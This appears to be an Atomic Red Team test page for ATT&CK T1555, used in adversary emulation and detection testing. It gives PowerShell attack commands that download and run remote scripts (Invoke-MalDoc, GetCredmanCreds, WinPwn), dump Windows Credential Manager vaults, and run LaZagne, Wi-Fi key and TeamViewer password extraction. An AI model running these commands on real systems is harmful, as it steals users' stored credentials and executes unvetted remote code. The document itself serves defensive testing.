T1555
Credentials from Password Stores
Description from ATT&CK
Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.
Atomic Tests
Atomic Test #1 - Extract Windows Credential Manager via VBA
This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt
Supported Platforms: windows
auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
4
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
Cleanup Commands:
1
2
Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
Dependencies: Run with powershell!
Description: Microsoft Word must be installed
Check Prereq Commands:
1
2
3
4
5
6
7
try {
New-Object -COMObject "word.Application" | Out-Null
$process = "winword"
Stop-Process -Name $process
exit 0
} catch { exit 1 }
Get Prereq Commands:
1
2
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
This module will extract the credentials from Windows Credential Manager
Supported Platforms: windows
auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
Inputs:
None
Attack Commands: Run with powershell!
1
2
IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force
Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
This module will extract the credentials from Windows Credential Manager
Supported Platforms: windows
auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
Inputs:
None
Attack Commands: Run with powershell!
1
2
IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
Atomic Test #4 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]
This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
Supported Platforms: windows
auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d
Inputs:
None
Attack Commands: Run with powershell!
1
2
vaultcmd /listcreds:"Windows Credentials" /all
Atomic Test #5 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]
This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
Supported Platforms: windows
auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e
Inputs:
None
Attack Commands: Run with powershell!
1
2
vaultcmd /listcreds:"Web Credentials" /all
Atomic Test #6 - WinPwn - Loot local Credentials - lazagne
The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software
Supported Platforms: windows
auto_generated_guid: 079ee2e9-6f16-47ca-a635-14efcd994118
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
lazagnemodule -consoleoutput -noninteractive
Atomic Test #7 - WinPwn - Loot local Credentials - Wifi Credentials
Loot local Credentials - Wifi Credentials technique via function of WinPwn
Supported Platforms: windows
auto_generated_guid: afe369c2-b42e-447f-98a3-fb1f4e2b8552
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
wificreds -consoleoutput -noninteractive
Atomic Test #8 - WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn
Supported Platforms: windows
auto_generated_guid: db965264-3117-4bad-b7b7-2523b7856b92
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
decryptteamviewer -consoleoutput -noninteractive